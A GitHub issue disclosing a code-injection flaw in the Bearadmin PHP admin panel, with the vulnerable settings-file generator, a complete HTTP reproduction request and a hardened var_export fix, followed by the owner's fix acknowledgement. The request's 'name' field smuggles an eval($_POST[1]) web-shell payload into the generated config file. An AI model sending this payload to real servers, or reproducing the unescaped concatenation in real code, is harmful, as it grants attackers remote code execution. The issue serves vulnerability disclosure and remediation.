
Bearadmin background code injection causes GetShell #20

Closed
lengf233 opened this issue Mar 8, 2023 · 1 comment


lengf233 commented Mar 8, 2023

Vulnerability analysis

This vulnerability is in the create_setting_file function in app/admin/common.php: the data submitted by the backend edit operation is written into the generated configuration file without any processing.

```php
// Fragment of create_setting_file (app/admin/common.php): user-controlled
// values are concatenated straight into PHP source text.
$file_code = "<?php\r\n/**\r\n* " .
    $data->name . ':' . $data->description .
    "\r\n* 此配置文件为自动生成,生成时间" . date('Y-m-d H:i:s') .
    "\r\n*/\r\n\r\nreturn [";
foreach ($setting as $value) {
    $file_code .= "\r\n    // " . $value['name'] . ':' . $value['description'] . "\r\n    '" . $value['code'] . "'=>[";
    foreach ($value->content as $content) {
        if (is_array($content['content'])) {
            $content['content'] = implode(',', $content['content']);
        }
        // A single quote in $content['content'] closes the string literal.
        $file_code .= "\r\n    // " . $content['name'] . "\r\n    '" .
            $content['field'] . "'=>'" . $content['content'] . "',";
    }
    $file_code .= "\r\n],";
}
$file_code .= "\r\n];";
```

This results in arbitrary code injection when the backend settings are saved.

Vulnerability reproduction

Request:

```http
POST /index.php/admin/setting/update.html HTTP/1.1
Host: badmin.com
Content-Length: 1051
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjpBKukHjGOJd7FL0
Origin: http://badmin.com
Referer: http://badmin.com/index.php/admin/setting/admin.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-GB;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: AppSId=b270c2ec094b300276f41e6235e52111; device_id_uid_2=7535e03c33438ab36562e92183b6380fe4f15c19; DarkMode=0; HeaderFixed=0; DropdownLegacyOffset=0; NoBorder=0; SidebarCollapsed=0; SidebarFixed=0; SidebarMini=0; SidebarMiniMd=0; SidebarMiniXs=0; FlatSidebar=0; LegacySidebar=0; CompactSidebar=0; ChildIndentSidebar=0; ChildHideSidebar=0; NoExpandSidebar=0; FootFixed=0; TextSmBody=0; TextSmHeader=0; TextSmBrand=0; TextSmSidebar=0; TextSmFooter=0
Connection: close

------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="name"

XX后台系统'.eval($_POST[1]).'
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="short_name"

后台
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="author"

xx科技
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="website"

#
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="version"

0.1
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="logo_file"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="logo"

/static/admin/images/logo.png
------WebKitFormBoundaryjpBKukHjGOJd7FL0
Content-Disposition: form-data; name="__token__"

11e6f7eadc0edc07bce93d111408c05e
------WebKitFormBoundaryjpBKukHjGOJd7FL0--
```

Result after the modification:

The generated admin.php contains the malicious code, through which an attacker can compromise the server.

Remediation suggestion

  • Escape the characters entered by the user
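One hardened way to write the settings file, added here as an example and not Bearadmin's own code or the maintainer's fix: build a PHP array and serialize it with var_export() so every value is emitted as a properly quoted literal, and strip comment terminators from the header. Function names and the sample input are hypothetical; the input reuses the payload shape reported above to show it becomes inert data.

```php
<?php
// Added example (hypothetical names, not the project's code): settings are
// serialized with var_export() instead of being spliced into source text.

function build_setting_file(string $name, string $description, array $settings): string
{
    $groups = [];
    foreach ($settings as $group) {
        $entries = [];
        foreach ($group['content'] as $item) {
            $content = $item['content'];
            if (is_array($content)) {
                $content = implode(',', $content);
            }
            // Keys and values are stored as data; quoting is left to var_export.
            $entries[(string) $item['field']] = (string) $content;
        }
        $groups[(string) $group['code']] = $entries;
    }

    // Header comment: remove newlines and the "*/" terminator so user text
    // cannot close the comment block and start PHP code.
    $header = str_replace(["\r", "\n", '*/'], ' ', $name . ':' . $description);

    return "<?php\n/**\n* " . $header
        . "\n* Auto-generated on " . date('Y-m-d H:i:s')
        . "\n*/\n\nreturn " . var_export($groups, true) . ";\n";
}

// Constructed input mirroring the "name" field from the report.
$settings = [[
    'code'    => 'admin',
    'content' => [
        ['field' => 'name',    'content' => "XX后台系统'.eval(\$_POST[1]).'"],
        ['field' => 'version', 'content' => '0.1'],
    ],
]];

echo build_setting_file('Admin */ ?>', 'backend settings', $settings);
```

The emitted file contains `'name' => 'XX后台系统\'.eval($_POST[1]).\''`, a quoted string with the single quotes escaped by var_export, so including it returns data rather than executing code.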
yupoxiong (Owner) commented

Temporarily fixed, thanks for the feedback.
